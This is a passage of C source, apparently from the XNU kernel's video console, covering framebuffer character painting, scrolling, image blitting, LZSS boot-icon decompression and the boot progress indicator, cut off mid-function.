(attrs & ATTR_UNDER && i == ISO_CHAR_HEIGHT - 1) { val = ~val; } val = (vc_color_back & ~val) | (vc_color_fore & val); *store++ = val; lastpixel = save & 0xff; } where = (uint32_t*)(((unsigned char*)where) + vinfo.v_rowbytes); } } } static void vc_paint_char_16(unsigned int xx, unsigned int yy, unsigned char ch, int attrs, __unused unsigned char ch_previous, __unused int attrs_previous) { uint32_t *theChar; uint32_t *where; int i; if (vc_rendered_font) { theChar = (uint32_t*)(vc_rendered_font + (ch * vc_rendered_char_size)); } else { vc_render_char(ch, vc_rendered_char, 16); theChar = (uint32_t*)(vc_rendered_char); } where = (uint32_t*)(vinfo.v_baseaddr + (yy * ISO_CHAR_HEIGHT * vinfo.v_rowbytes) + (xx * ISO_CHAR_WIDTH * 2)); if (!attrs) { for (i = 0; i < ISO_CHAR_HEIGHT; i++) { /* No attrs ? FLY ! */ uint32_t *store = where; int x; for (x = 0; x < 4; x++) { uint32_t val = *theChar++; val = (vc_color_back & ~val) | (vc_color_fore & val); *store++ = val; } where = (uint32_t*)(((unsigned char*)where) + vinfo.v_rowbytes); } } else { for (i = 0; i < ISO_CHAR_HEIGHT; i++) { /* a little bit slower */ uint32_t *store = where, lastpixel = 0; int x; for (x = 0; x < 4; x++) { uint32_t val = *theChar++, save = val; if (attrs & ATTR_BOLD) { /* bold support */ if (save == 0xFFFF0000) { val |= 0xFFFF; } else if (lastpixel && !(save & 0xFFFF0000)) { val |= 0xFFFF0000; } } if (attrs & ATTR_REVERSE) { val = ~val; } if (attrs & ATTR_UNDER && i == ISO_CHAR_HEIGHT - 1) { val = ~val; } val = (vc_color_back & ~val) | (vc_color_fore & val); *store++ = val; lastpixel = save & 0x7fff; } where = (uint32_t*)(((unsigned char*)where) + vinfo.v_rowbytes); } } } static void vc_paint_char_32(unsigned int xx, unsigned int yy, unsigned char ch, int attrs, unsigned char ch_previous, int attrs_previous) { uint32_t *theChar; uint32_t *theCharPrevious; uint32_t *where; int i; if (vc_rendered_font) { theChar = (uint32_t*)(vc_rendered_font + (ch * vc_rendered_char_size)); theCharPrevious = (uint32_t*)(vc_rendered_font + (ch_previous * vc_rendered_char_size)); } else { vc_render_char(ch, vc_rendered_char, 32); theChar = (uint32_t*)(vc_rendered_char); theCharPrevious = NULL; } if (!ch_previous) { theCharPrevious = NULL; } if (attrs_previous) { theCharPrevious = NULL; } where = (uint32_t*)(vinfo.v_baseaddr + (yy * ISO_CHAR_HEIGHT * vinfo.v_rowbytes) + (xx * ISO_CHAR_WIDTH * 4)); if (!attrs) { for (i = 0; i < ISO_CHAR_HEIGHT; i++) { /* No attrs ? FLY ! */ uint32_t *store = where; int x; for (x = 0; x < 8; x++) { uint32_t val = *theChar++; if (theCharPrevious == NULL || val != *theCharPrevious++) { val = (vc_color_back & ~val) | (vc_color_fore & val); *store++ = val; } else { store++; } } where = (uint32_t *)(((unsigned char*)where) + vinfo.v_rowbytes); } } else { for (i = 0; i < ISO_CHAR_HEIGHT; i++) { /* a little slower */ uint32_t *store = where, lastpixel = 0; int x; for (x = 0; x < 8; x++) { uint32_t val = *theChar++, save = val; if (attrs & ATTR_BOLD) { /* bold support */ if (lastpixel && !save) { val = 0xFFFFFFFF; } } if (attrs & ATTR_REVERSE) { val = ~val; } if (attrs & ATTR_UNDER && i == ISO_CHAR_HEIGHT - 1) { val = ~val; } val = (vc_color_back & ~val) | (vc_color_fore & val); *store++ = val; lastpixel = save; } where = (uint32_t*)(((unsigned char*)where) + vinfo.v_rowbytes); } } } static void vc_paint_char(unsigned int xx, unsigned int yy, unsigned char ch, int attrs, unsigned char ch_previous, int attrs_previous) { if (!vinfo.v_depth) { return; } switch (vinfo.v_depth) { case 8: vc_paint_char_8(xx, yy, ch, attrs, ch_previous, attrs_previous); break; case 16: vc_paint_char_16(xx, yy, ch, attrs, ch_previous, attrs_previous); break; case 30: case 32: vc_paint_char_32(xx, yy, ch, attrs, ch_previous, attrs_previous); break; } } static void vc_render_font(short newdepth) { static short olddepth = 0; int charindex; /* index in ISO font */ unsigned char *rendered_font; unsigned int rendered_font_size; int rendered_char_size; spl_t s; if (vm_initialized == FALSE) { return; /* nothing to do */ } if (olddepth == newdepth && vc_rendered_font) { return; /* nothing to do */ } s = splhigh(); VCPUTC_LOCK_LOCK(); rendered_font = vc_rendered_font; rendered_font_size = vc_rendered_font_size; rendered_char_size = vc_rendered_char_size; vc_rendered_font = NULL; vc_rendered_font_size = 0; vc_rendered_char_size = 0; VCPUTC_LOCK_UNLOCK(); splx(s); if (rendered_font) { kheap_free(KHEAP_DATA_BUFFERS, rendered_font, rendered_font_size); rendered_font = NULL; } if (newdepth) { rendered_char_size = ISO_CHAR_HEIGHT * (((newdepth + 7) / 8) * ISO_CHAR_WIDTH); rendered_font_size = (ISO_CHAR_MAX - ISO_CHAR_MIN + 1) * rendered_char_size; rendered_font = kheap_alloc(KHEAP_DATA_BUFFERS, rendered_font_size, Z_WAITOK); } if (rendered_font == NULL) { return; } for (charindex = ISO_CHAR_MIN; charindex <= ISO_CHAR_MAX; charindex++) { vc_render_char(charindex, rendered_font + (charindex * rendered_char_size), newdepth); } olddepth = newdepth; s = splhigh(); VCPUTC_LOCK_LOCK(); vc_rendered_font = rendered_font; vc_rendered_font_size = rendered_font_size; vc_rendered_char_size = rendered_char_size; VCPUTC_LOCK_UNLOCK(); splx(s); } static void vc_enable(boolean_t enable) { vc_render_font(enable ? vinfo.v_depth : 0); } static void vc_reverse_cursor(unsigned int xx, unsigned int yy) { uint32_t *where; int line, col; if (!vinfo.v_depth) { return; } where = (uint32_t*)(vinfo.v_baseaddr + (yy * ISO_CHAR_HEIGHT * vinfo.v_rowbytes) + (xx /** ISO_CHAR_WIDTH*/ * vinfo.v_depth)); for (line = 0; line < ISO_CHAR_HEIGHT; line++) { switch (vinfo.v_depth) { case 8: where[0] = ~where[0]; where[1] = ~where[1]; break; case 16: for (col = 0; col < 4; col++) { where[col] = ~where[col]; } break; case 32: for (col = 0; col < 8; col++) { where[col] = ~where[col]; } break; } where = (uint32_t*)(((unsigned char*)where) + vinfo.v_rowbytes); } } static void vc_scroll_down(int num, unsigned int scrreg_top, unsigned int scrreg_bottom) { uint32_t *from, *to, linelongs, i, line, rowline, rowscanline; if (!vinfo.v_depth) { return; } linelongs = vinfo.v_rowbytes * (ISO_CHAR_HEIGHT >> 2); rowline = vinfo.v_rowbytes >> 2; rowscanline = vinfo.v_rowscanbytes >> 2; to = (uint32_t *) vinfo.v_baseaddr + (linelongs * scrreg_bottom) - (rowline - rowscanline); from = to - (linelongs * num); /* handle multiple line scroll (Michel Pollet) */ i = (scrreg_bottom - scrreg_top) - num; while (i-- > 0) { for (line = 0; line < ISO_CHAR_HEIGHT; line++) { /* * Only copy what is displayed */ video_scroll_down(from, (from - (vinfo.v_rowscanbytes >> 2)), to); from -= rowline; to -= rowline; } } } static void vc_scroll_up(int num, unsigned int scrreg_top, unsigned int scrreg_bottom) { uint32_t *from, *to, linelongs, i, line, rowline, rowscanline; if (!vinfo.v_depth) { return; } linelongs = vinfo.v_rowbytes * (ISO_CHAR_HEIGHT >> 2); rowline = vinfo.v_rowbytes >> 2; rowscanline = vinfo.v_rowscanbytes >> 2; to = (uint32_t *) vinfo.v_baseaddr + (scrreg_top * linelongs); from = to + (linelongs * num); /* handle multiple line scroll (Michel Pollet) */ i = (scrreg_bottom - scrreg_top) - num; while (i-- > 0) { for (line = 0; line < ISO_CHAR_HEIGHT; line++) { /* * Only copy what is displayed */ video_scroll_up(from, (from + (vinfo.v_rowscanbytes >> 2)), to); from += rowline; to += rowline; } } } static void vc_update_color(int color, boolean_t fore) { if (!vinfo.v_depth) { return; } if (fore) { vc_color_fore = vc_colors[color][vc_color_index_table[vinfo.v_depth]]; } else { vc_color_back = vc_colors[color][vc_color_index_table[vinfo.v_depth]]; } } /* * Video Console (Back-End): Icon Control * -------------------------------------- */ static vc_progress_element * vc_progress; enum { kMaxProgressData = 3 }; static const unsigned char * vc_progress_data[kMaxProgressData]; static const unsigned char * vc_progress_alpha; static boolean_t vc_progress_enable; static const unsigned char * vc_clut; static const unsigned char * vc_clut8; static unsigned char vc_revclut8[256]; static uint32_t vc_progress_interval; static uint32_t vc_progress_count; static uint32_t vc_progress_angle; static uint64_t vc_progress_deadline; static thread_call_data_t vc_progress_call; static boolean_t vc_needsave; static void * vc_saveunder; static vm_size_t vc_saveunder_len; static int8_t vc_uiscale = 1; vc_progress_user_options vc_progress_options; vc_progress_user_options vc_user_options; decl_simple_lock_data(, vc_progress_lock); #if defined(XNU_TARGET_OS_OSX) static int vc_progress_withmeter = 3; int vc_progressmeter_enable; static int vc_progressmeter_drawn; int vc_progressmeter_value; static uint32_t vc_progressmeter_count; static uint32_t vc_progress_meter_start; static uint32_t vc_progress_meter_end; static uint64_t vc_progressmeter_interval; static uint64_t vc_progressmeter_deadline; static thread_call_data_t vc_progressmeter_call; static void * vc_progressmeter_backbuffer; static uint32_t vc_progressmeter_diskspeed = 256; #endif /* defined(XNU_TARGET_OS_OSX) */ enum { kSave = 0x10, kDataIndexed = 0x20, kDataAlpha = 0x40, kDataBack = 0x80, kDataRotate = 0x03, }; static void vc_blit_rect(int x, int y, int bx, int width, int height, int sourceWidth, int sourceHeight, int sourceRow, int backRow, const unsigned char * dataPtr, void * backBuffer, unsigned int flags); static void vc_blit_rect_8(int x, int y, int bx, int width, int height, int sourceWidth, int sourceHeight, int sourceRow, int backRow, const unsigned char * dataPtr, unsigned char * backBuffer, unsigned int flags); static void vc_blit_rect_16(int x, int y, int bx, int width, int height, int sourceWidth, int sourceHeight, int sourceRow, int backRow, const unsigned char * dataPtr, unsigned short * backBuffer, unsigned int flags); static void vc_blit_rect_32(int x, int y, int bx, int width, int height, int sourceWidth, int sourceHeight, int sourceRow, int backRow, const unsigned char * dataPtr, unsigned int * backBuffer, unsigned int flags); static void vc_blit_rect_30(int x, int y, int bx, int width, int height, int sourceWidth, int sourceHeight, int sourceRow, int backRow, const unsigned char * dataPtr, unsigned int * backBuffer, unsigned int flags); static void vc_progress_task( void * arg0, void * arg ); #if defined(XNU_TARGET_OS_OSX) static void vc_progressmeter_task( void * arg0, void * arg ); #endif /* defined(XNU_TARGET_OS_OSX) */ static void vc_blit_rect(int x, int y, int bx, int width, int height, int sourceWidth, int sourceHeight, int sourceRow, int backRow, const unsigned char * dataPtr, void * backBuffer, unsigned int flags) { if (!vinfo.v_depth) { return; } if (((unsigned int)(x + width)) > vinfo.v_width) { return; } if (((unsigned int)(y + height)) > vinfo.v_height) { return; } switch (vinfo.v_depth) { case 8: if (vc_clut8 == vc_clut) { vc_blit_rect_8( x, y, bx, width, height, sourceWidth, sourceHeight, sourceRow, backRow, dataPtr, (unsigned char *) backBuffer, flags ); } break; case 16: vc_blit_rect_16( x, y, bx, width, height, sourceWidth, sourceHeight, sourceRow, backRow, dataPtr, (unsigned short *) backBuffer, flags ); break; case 32: vc_blit_rect_32( x, y, bx, width, height, sourceWidth, sourceHeight, sourceRow, backRow, dataPtr, (unsigned int *) backBuffer, flags ); break; case 30: vc_blit_rect_30( x, y, bx, width, height, sourceWidth, sourceHeight, sourceRow, backRow, dataPtr, (unsigned int *) backBuffer, flags ); break; } } static void vc_blit_rect_8(int x, int y, __unused int bx, int width, int height, int sourceWidth, int sourceHeight, int sourceRow, __unused int backRow, const unsigned char * dataPtr, __unused unsigned char * backBuffer, __unused unsigned int flags) { volatile unsigned short * dst; int line, col; unsigned int data = 0, out = 0; int sx, sy, a, b, c, d; int scale = 0x10000; a = (sourceRow == 1) ? 0 : vc_rotate_matr[kDataRotate & flags][0][0] * scale; b = (sourceRow == 1) ? 0 : vc_rotate_matr[kDataRotate & flags][0][1] * scale; c = vc_rotate_matr[kDataRotate & flags][1][0] * scale; d = vc_rotate_matr[kDataRotate & flags][1][1] * scale; sx = ((a + b) < 0) ? ((sourceWidth * scale) - 0x8000) : 0; sy = ((c + d) < 0) ? ((sourceHeight * scale) - 0x8000) : 0; if (!sourceRow) { data = (unsigned int)(uintptr_t)dataPtr; } dst = (volatile unsigned short *) (vinfo.v_baseaddr + (y * vinfo.v_rowbytes) + (x * 4)); for (line = 0; line < height; line++) { for (col = 0; col < width; col++) { if (sourceRow) { data = dataPtr[((sx + (col * a) + (line * b)) >> 16) + sourceRow * (((sy + (col * c) + (line * d)) >> 16))]; } if (kDataAlpha & flags) { out = vc_revclut8[data]; } else { out = data; } *(dst + col) = out; } dst = (volatile unsigned short *) (((volatile char*)dst) + vinfo.v_rowbytes); } } /* For ARM, 16-bit is 565 (RGB); it is 1555 (XRGB) on other platforms */ #ifdef __arm__ #define CLUT_MASK_R 0xf8 #define CLUT_MASK_G 0xfc #define CLUT_MASK_B 0xf8 #define CLUT_SHIFT_R << 8 #define CLUT_SHIFT_G << 3 #define CLUT_SHIFT_B >> 3 #define MASK_R 0xf800 #define MASK_G 0x07e0 #define MASK_B 0x001f #define MASK_R_8 0x7f800 #define MASK_G_8 0x01fe0 #define MASK_B_8 0x000ff #else #define CLUT_MASK_R 0xf8 #define CLUT_MASK_G 0xf8 #define CLUT_MASK_B 0xf8 #define CLUT_SHIFT_R << 7 #define CLUT_SHIFT_G << 2 #define CLUT_SHIFT_B >> 3 #define MASK_R 0x7c00 #define MASK_G 0x03e0 #define MASK_B 0x001f #define MASK_R_8 0x3fc00 #define MASK_G_8 0x01fe0 #define MASK_B_8 0x000ff #endif static void vc_blit_rect_16( int x, int y, int bx, int width, int height, int sourceWidth, int sourceHeight, int sourceRow, int backRow, const unsigned char * dataPtr, unsigned short * backPtr, unsigned int flags) { volatile unsigned short * dst; int line, col; unsigned int data = 0, out = 0, back = 0; int sx, sy, a, b, c, d; int scale = 0x10000; a = (sourceRow == 1) ? 0 : vc_rotate_matr[kDataRotate & flags][0][0] * scale; b = (sourceRow == 1) ? 0 : vc_rotate_matr[kDataRotate & flags][0][1] * scale; c = vc_rotate_matr[kDataRotate & flags][1][0] * scale; d = vc_rotate_matr[kDataRotate & flags][1][1] * scale; sx = ((a + b) < 0) ? ((sourceWidth * scale) - 0x8000) : 0; sy = ((c + d) < 0) ? ((sourceHeight * scale) - 0x8000) : 0; if (!sourceRow) { data = (unsigned int)(uintptr_t)dataPtr; } if (backPtr) { backPtr += bx; } dst = (volatile unsigned short *) (vinfo.v_baseaddr + (y * vinfo.v_rowbytes) + (x * 2)); for (line = 0; line < height; line++) { for (col = 0; col < width; col++) { if (sourceRow) { data = dataPtr[((sx + (col * a) + (line * b)) >> 16) + sourceRow * (((sy + (col * c) + (line * d)) >> 16))]; } if (backPtr) { if (kSave & flags) { back = *(dst + col); *backPtr++ = back; } else { back = *backPtr++; } } if (kDataIndexed & flags) { out = ((CLUT_MASK_R & (vc_clut[data * 3 + 0]))CLUT_SHIFT_R) | ((CLUT_MASK_G & (vc_clut[data * 3 + 1]))CLUT_SHIFT_G) | ((CLUT_MASK_B & (vc_clut[data * 3 + 2]))CLUT_SHIFT_B); } else if (kDataAlpha & flags) { out = (((((back & MASK_R) * data) + MASK_R_8) >> 8) & MASK_R) | (((((back & MASK_G) * data) + MASK_G_8) >> 8) & MASK_G) | (((((back & MASK_B) * data) + MASK_B_8) >> 8) & MASK_B); if (vc_progress_white) { out += (((0xff - data) & CLUT_MASK_R)CLUT_SHIFT_R) | (((0xff - data) & CLUT_MASK_G)CLUT_SHIFT_G) | (((0xff - data) & CLUT_MASK_B)CLUT_SHIFT_B); } } else if (kDataBack & flags) { out = back; } else { out = data; } *(dst + col) = out; } dst = (volatile unsigned short *) (((volatile char*)dst) + vinfo.v_rowbytes); if (backPtr) { backPtr += backRow - width; } } } static void vc_blit_rect_32(int x, int y, int bx, int width, int height, int sourceWidth, int sourceHeight, int sourceRow, int backRow, const unsigned char * dataPtr, unsigned int * backPtr, unsigned int flags) { volatile unsigned int * dst; int line, col; unsigned int data = 0, out = 0, back = 0; int sx, sy, a, b, c, d; int scale = 0x10000; a = (sourceRow == 1) ? 0 : vc_rotate_matr[kDataRotate & flags][0][0] * scale; b = (sourceRow == 1) ? 0 : vc_rotate_matr[kDataRotate & flags][0][1] * scale; c = vc_rotate_matr[kDataRotate & flags][1][0] * scale; d = vc_rotate_matr[kDataRotate & flags][1][1] * scale; sx = ((a + b) < 0) ? ((sourceWidth * scale) - 0x8000) : 0; sy = ((c + d) < 0) ? ((sourceHeight * scale) - 0x8000) : 0; if (!sourceRow) { data = (unsigned int)(uintptr_t)dataPtr; } if (backPtr) { backPtr += bx; } dst = (volatile unsigned int *) (vinfo.v_baseaddr + (y * vinfo.v_rowbytes) + (x * 4)); for (line = 0; line < height; line++) { for (col = 0; col < width; col++) { if (sourceRow) { data = dataPtr[((sx + (col * a) + (line * b)) >> 16) + sourceRow * (((sy + (col * c) + (line * d)) >> 16))]; } if (backPtr) { if (kSave & flags) { back = *(dst + col); *backPtr++ = back; } else { back = *backPtr++; } } if (kDataIndexed & flags) { out = (vc_clut[data * 3 + 0] << 16) | (vc_clut[data * 3 + 1] << 8) | (vc_clut[data * 3 + 2]); } else if (kDataAlpha & flags) { out = (((((back & 0x00ff00ff) * data) + 0x00ff00ff) >> 8) & 0x00ff00ff) | (((((back & 0x0000ff00) * data) + 0x0000ff00) >> 8) & 0x0000ff00); if (vc_progress_white) { out += ((0xff - data) << 16) | ((0xff - data) << 8) | (0xff - data); } } else if (kDataBack & flags) { out = back; } else { out = data; } *(dst + col) = out; } dst = (volatile unsigned int *) (((volatile char*)dst) + vinfo.v_rowbytes); if (backPtr) { backPtr += backRow - width; } } } static void vc_blit_rect_30(int x, int y, int bx, int width, int height, int sourceWidth, int sourceHeight, int sourceRow, int backRow, const unsigned char * dataPtr, unsigned int * backPtr, unsigned int flags) { volatile unsigned int * dst; int line, col; unsigned int data = 0, out = 0, back = 0; unsigned long long exp; int sx, sy, a, b, c, d; int scale = 0x10000; a = (sourceRow == 1) ? 0 : vc_rotate_matr[kDataRotate & flags][0][0] * scale; b = (sourceRow == 1) ? 0 : vc_rotate_matr[kDataRotate & flags][0][1] * scale; c = vc_rotate_matr[kDataRotate & flags][1][0] * scale; d = vc_rotate_matr[kDataRotate & flags][1][1] * scale; sx = ((a + b) < 0) ? ((sourceWidth * scale) - 0x8000) : 0; sy = ((c + d) < 0) ? ((sourceHeight * scale) - 0x8000) : 0; if (!sourceRow) { data = (unsigned int)(uintptr_t)dataPtr; } if (backPtr) { backPtr += bx; } dst = (volatile unsigned int *) (vinfo.v_baseaddr + (y * vinfo.v_rowbytes) + (x * 4)); for (line = 0; line < height; line++) { for (col = 0; col < width; col++) { if (sourceRow) { data = dataPtr[((sx + (col * a) + (line * b)) >> 16) + sourceRow * (((sy + (col * c) + (line * d)) >> 16))]; } if (backPtr) { if (kSave & flags) { back = *(dst + col); *backPtr++ = back; } else { back = *backPtr++; } } if (kDataIndexed & flags) { out = (vc_clut[data * 3 + 0] << 22) | (vc_clut[data * 3 + 1] << 12) | (vc_clut[data * 3 + 2] << 2); } else if (kDataAlpha & flags) { exp = back; exp = (((((exp & 0x3FF003FF) * data) + 0x0FF000FF) >> 8) & 0x3FF003FF) | (((((exp & 0x000FFC00) * data) + 0x0003FC00) >> 8) & 0x000FFC00); out = (unsigned int)exp; if (vc_progress_white) { out += ((0xFF - data) << 22) | ((0xFF - data) << 12) | ((0xFF - data) << 2); } } else if (kDataBack & flags) { out = back; } else { out = data; } *(dst + col) = out; } dst = (volatile unsigned int *) (((volatile char*)dst) + vinfo.v_rowbytes); if (backPtr) { backPtr += backRow - width; } } } static void vc_clean_boot_graphics(void) { #if defined(XNU_TARGET_OS_OSX) // clean up possible FDE login graphics vc_progress_set(FALSE, 0); const unsigned char * color = (typeof(color))(uintptr_t)(vc_progress_white ? 0x00000000 : 0xBFBFBFBF); vc_blit_rect(0, 0, 0, vinfo.v_width, vinfo.v_height, vinfo.v_width, vinfo.v_height, 0, 0, color, NULL, 0); #endif } /* * Routines to render the lzss image format */ struct lzss_image_state { uint32_t col; uint32_t row; uint32_t width; uint32_t height; uint32_t bytes_per_row; volatile uint32_t * row_start; const uint8_t* clut; }; typedef struct lzss_image_state lzss_image_state; // returns 0 if OK, 1 if error static inline int vc_decompress_lzss_next_pixel(int next_data, lzss_image_state* state) { uint32_t palette_index = 0; uint32_t pixel_value = 0; palette_index = next_data * 3; pixel_value = ((uint32_t) state->clut[palette_index + 0] << 16) | ((uint32_t) state->clut[palette_index + 1] << 8) | ((uint32_t) state->clut[palette_index + 2]); *(state->row_start + state->col) = pixel_value; if (++state->col >= state->width) { state->col = 0; if (++state->row >= state->height) { return 1; } state->row_start = (volatile uint32_t *) (((uintptr_t)state->row_start) + state->bytes_per_row); } return 0; } /* * Blit an lzss compressed image to the framebuffer * Assumes 32 bit screen (which is everything we ship at the moment) * The function vc_display_lzss_icon was copied from libkern/mkext.c, then modified. */ /* * TODO: Does lzss use too much stack? 4096 plus bytes... * Can probably chop it down by 1/2. */ /************************************************************** * LZSS.C -- A Data Compression Program *************************************************************** * 4/6/1989 Haruhiko Okumura * Use, distribute, and modify this program freely. * Please send me your improved versions. * PC-VAN SCIENCE * NIFTY-Serve PAF01022 * CompuServe 74050,1022 * **************************************************************/ #define N 4096 /* size of ring buffer - must be power of 2 */ #define F 18 /* upper limit for match_length */ #define THRESHOLD 2 /* encode string into position and length * if match_length is greater than this */ // returns 0 if OK, 1 if error // x and y indicate upper left corner of image location on screen int vc_display_lzss_icon(uint32_t dst_x, uint32_t dst_y, uint32_t image_width, uint32_t image_height, const uint8_t *compressed_image, uint32_t compressed_size, const uint8_t *clut) { uint32_t* image_start; uint32_t bytes_per_pixel = 4; uint32_t bytes_per_row = vinfo.v_rowbytes; vc_clean_boot_graphics(); image_start = (uint32_t *) (vinfo.v_baseaddr + (dst_y * bytes_per_row) + (dst_x * bytes_per_pixel)); lzss_image_state state = {0, 0, image_width, image_height, bytes_per_row, image_start, clut}; int rval = 0; const uint8_t *src = compressed_image; uint32_t srclen = compressed_size; /* ring buffer of size N, with extra F-1 bytes to aid string comparison */ uint8_t text_buf[N + F - 1]; const uint8_t *srcend = src + srclen; int i, j, k, r, c; unsigned int flags; srcend = src + srclen; for (i = 0; i < N - F; i++) { text_buf[i] = ' '; } r = N - F; flags = 0; for (;;) { if (((flags >>= 1) & 0x100) == 0) { if (src < srcend) { c = *src++; } else { break; } flags = c | 0xFF00; /* uses higher byte cleverly */ } /* to count eight */ if (flags & 1) { if (src < srcend) { c = *src++; } else { break; } rval = vc_decompress_lzss_next_pixel(c, &state); if (rval != 0) { return rval; } text_buf[r++] = c; r &= (N - 1); } else { if (src < srcend) { i = *src++; } else { break; } if (src < srcend) { j = *src++; } else { break; } i |= ((j & 0xF0) << 4); j = (j & 0x0F) + THRESHOLD; for (k = 0; k <= j; k++) { c = text_buf[(i + k) & (N - 1)]; rval = vc_decompress_lzss_next_pixel(c, &state); if (rval != 0) { return rval; } text_buf[r++] = c; r &= (N - 1); } } } return 0; } void noroot_icon_test(void) { boolean_t o_vc_progress_enable = vc_progress_enable; vc_progress_enable = 1; //PE_display_icon( 0, "noroot"); vc_progress_enable = o_vc_progress_enable; } void vc_display_icon( vc_progress_element * desc, const unsigned char * data ) { int x, y, width, height; if (vc_progress_enable && vc_clut) { vc_clean_boot_graphics(); width = desc->width; height = desc->height; x = desc->dx; y = desc->dy; if (1 & desc->flags) { x += ((vinfo.v_width - width) / 2); y += ((vinfo.v_height - height) / 2); } vc_blit_rect( x, y, 0, width, height, width, height, width, 0, data, NULL, kDataIndexed ); } } void vc_progress_initialize( vc_progress_element * desc, const unsigned char * data1x, const unsigned char * data2x, const unsigned char * data3x, const unsigned char * clut ) { uint64_t abstime; if ((!clut) || (!desc) || (!data1x)) { return; } vc_clut = clut; vc_clut8 = clut; vc_progress = desc; vc_progress_data[0] = data1x; vc_progress_data[1] = data2x; vc_progress_data[2] = data3x; if (2 & vc_progress->flags) { vc_progress_alpha = data1x + vc_progress->count * vc_progress->width * vc_progress->height; } else { vc_progress_alpha = NULL; } thread_call_setup(&vc_progress_call, vc_progress_task, NULL); clock_interval_to_absolutetime_interval(vc_progress->time, 1000 * 1000, &abstime); vc_progress_interval = (uint32_t)abstime; #if defined(XNU_TARGET_OS_OSX) thread_call_setup(&vc_progressmeter_call, vc_progressmeter_task, NULL); clock_interval_to_absolutetime_interval(1000 / 8, 1000 * 1000, &abstime); vc_progressmeter_interval = (uint32_t)abstime; #endif /* defined(XNU_TARGET_OS_OSX) */ } void vc_progress_set(boolean_t enable, uint32_t vc_delay) { spl_t s; void *saveBuf = NULL; vm_size_t saveLen = 0; unsigned int count; unsigned int index; unsigned char pdata8; unsigned short pdata16; unsigned short * buf16; unsigned int pdata32; unsigned int * buf32; if (!vc_progress) { return; } #if defined(CONFIG_VC_PROGRESS_METER_SUPPORT) #if defined (__x86_64__) if (kBootArgsFlagBlack & ((boot_args *) PE_state.bootArgs)->flags) { return; } #endif /* defined (__x86_64__) */ if (1 & vc_progress_withmeter) { if (enable) { internal_enable_progressmeter(kProgressMeterKernel); } s = splhigh(); simple_lock(&vc_progress_lock, LCK_GRP_NULL); if (vc_progress_enable != enable) { vc_progress_enable = enable; if (enable) { vc_progressmeter_count = 0; clock_interval_to_deadline(vc_delay, 1000 * 1000 * 1000 /*second scale*/, &vc_progressmeter_deadline); thread_call_enter_delayed(&vc_progressmeter_call, vc_progressmeter_deadline); } else { thread_call_cancel(&vc_progressmeter_call); } } simple_unlock(&vc_progress_lock); splx(s); if (!enable) { internal_enable_progressmeter(kProgressMeterOff); } return; } #endif /* defined(CONFIG_VC_PROGRESS_METER_SUPPORT) */ if (enable) { saveLen = (vc_progress->width * vc_uiscale) * (vc_progress->height * vc_uiscale) * ((vinfo.v_depth + 7) / 8); saveBuf = kheap_alloc( KHEAP_DATA_BUFFERS, saveLen, Z_WAITOK ); switch (vinfo.v_depth) { case 8: for (count = 0; count < 256; count++) { vc_revclut8[count] = vc_clut[0x01 * 3]; pdata8 = (vc_clut[0x01 * 3] * count + 0x0ff) >> 8; for (index = 0; index < 256; index++) { if ((pdata8 == vc_clut[index * 3 + 0]) && (pdata8 == vc_clut[index * 3 + 1]) && (pdata8 == vc_clut[index * 3 + 2])) { vc_revclut8[count] = index; break; } } } memset( saveBuf, 0x01, saveLen ); break; case 16: buf16 = (unsigned short *) saveBuf; pdata16 = ((vc_clut[0x01 * 3 + 0] & CLUT_MASK_R)CLUT_SHIFT_R) | ((vc_clut[0x01 * 3 + 0] & CLUT_MASK_G)CLUT_SHIFT_G) | ((vc_clut[0x01 * 3 + 0] & CLUT_MASK_B)CLUT_SHIFT_B); for (count = 0; count < saveLen / 2; count++) { buf16[count] = pdata16; } break; case 32: buf32 = (unsigned int *) saveBuf; pdata32 = ((vc_clut[0x01 * 3 + 0] & 0xff) << 16) | ((vc_clut[0x01 * 3 + 1] & 0xff) << 8) | ((vc_clut[0x01 * 3 + 2] & 0xff) << 0); for (count = 0; count < saveLen / 4; count++) { buf32[count] = pdata32; } break; } } s = splhigh(); simple_lock(&vc_progress_lock, LCK_GRP_NULL); if (vc_progress_enable != enable) { vc_progress_enable = enable; if (enable) { vc_needsave = TRUE; vc_saveunder = saveBuf; vc_saveunder_len = saveLen; saveBuf = NULL; saveLen = 0; vc_progress_count = 0; vc_progress_angle = 0; clock_interval_to_deadline(vc_delay, 1000 * 1000 * 1000 /*second scale*/, &vc_progress_deadline); thread_call_enter_delayed(&vc_progress_call, vc_progress_deadline); } else { if (vc_saveunder) { saveBuf = vc_saveunder; saveLen = vc_saveunder_len; vc_saveunder = NULL; vc_saveunder_len = 0; } thread_call_cancel(&vc_progress_call); } } simple_unlock(&vc_progress_lock); splx(s); if (saveBuf) { kheap_free( KHEAP_DATA_BUFFERS, saveBuf, saveLen ); } } #if defined(XNU_TARGET_OS_OSX) static uint32_t vc_progressmeter_range(uint32_t pos) { uint32_t ret; if (pos > kProgressMeterEnd) { pos = kProgressMeterEnd; } ret = vc_progress_meter_start + ((pos * (vc_progress_meter_end - vc_progress_meter_start)) / kProgressMeterEnd); return ret; } static void vc_progressmeter_task(__unused void *arg0, __unused void *arg) { spl_t s; uint64_t interval; s = splhigh(); simple_lock(&vc_progress_lock, LCK_GRP_NULL); if (kProgressMeterKernel == vc_progressmeter_enable) { uint32_t pos = (vc_progressmeter_count >> 13); internal_set_progressmeter(vc_progressmeter_range(pos)); if (pos < kProgressMeterEnd) { static uint16_t incr[8] = { 10000, 10000, 8192, 4096, 2048, 384, 384, 64 }; vc_progressmeter_count += incr[(pos * 8) / kProgressMeterEnd]; interval = vc_progressmeter_interval; interval = ((interval * 256) / vc_progressmeter_diskspeed); clock_deadline_for_periodic_event(interval, mach_absolute_time(), &vc_progressmeter_deadline); thread_call_enter_delayed(&vc_progressmeter_call, vc_progressmeter_deadline); } } simple_unlock(&vc_progress_lock); splx(s); } void vc_progress_setdiskspeed(uint32_t speed) { vc_progressmeter_diskspeed = speed; } #endif /* defined(XNU_TARGET_OS_OSX) */ static void vc_progress_task(__unused void *arg0, __unused void *arg) { spl_t s; int x, y, width, height; uint64_t x_pos, y_pos; const unsigned char * data; s = splhigh(); simple_lock(&vc_progress_lock, LCK_GRP_NULL); if (vc_progress_enable) { do { vc_progress_count++; if (vc_progress_count >= vc_progress->count) { vc_progress_count = 0; vc_progress_angle++; } width = (vc_progress->width * vc_uiscale); height = (vc_progress->height * vc_uiscale); data = vc_progress_data[vc_uiscale - 1]; if (!data) { break; } if (kVCUsePosition & vc_progress_options.options) { /* Rotation: 0:normal, 1:right 90, 2:left 180, 3:left 90 */ switch (3 & vinfo.v_rotate) { case kDataRotate0: x_pos = vc_progress_options.x_pos; y_pos = vc_progress_options.y_pos; break; case 